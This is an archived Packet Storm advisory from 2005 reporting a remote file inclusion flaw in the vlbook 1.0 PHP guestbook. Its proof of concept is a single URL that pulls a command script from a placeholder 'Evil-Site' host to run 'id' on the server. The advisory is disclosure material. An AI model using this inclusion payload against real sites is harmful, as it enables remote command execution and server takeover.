vlbook10.txt

2005-10-11T00:00:00
ID PACKETSTORM:40570
Type packetstorm
Reporter BiPi_HaCk
Modified 2005-10-11T00:00:00

Description

                                        
                                            `------------------------------------------------------  
Nightmare TeAmZ Advisory 005  
------------------------------------------------------  
Date - 10/2005  
vlbook Remote File Inclusion  
  
  
AFFECTED PRODUCTS  
=================  
vlbook 1.0 Guestbook  
http://vlbook.com/  
  
  
OVERVIEW  
========  
he vlbook is a free, open source and light-weight guestbook written in PHP   
using flat files to store  
  
messages and settings. It comes with install script for quick and effortless   
installation.  
  
  
DETAILS  
=======  
  
1. Remote File Inclusion  
  
  
POC  
===  
  
1.  
------  
Remote File Inclusion  
  
Exemple  
--------  
1. Remote File Inclusion  
  
Vulnerable Path:  
  
/index.php?user=  
  
Exemple:  
  
www.[Host].com/[Path]/index.php?user=english&l=1&t=1&a=http://www.[Evil-Site.org/cmd.php?&cmd=id  
  
  
Credits  
=======  
This vulnerability was discovered and researched by  
BiPi_HaCk, Advisory by Sub_Z3r0 of Nightmare TeAmZ,  
  
Site: http://www.NightmareTeAmZ.altervista.org  
  
_________________________________________________________________  
Blocca le pop-up pubblicitarie con MSN Toolbar! http://toolbar.msn.it/  
`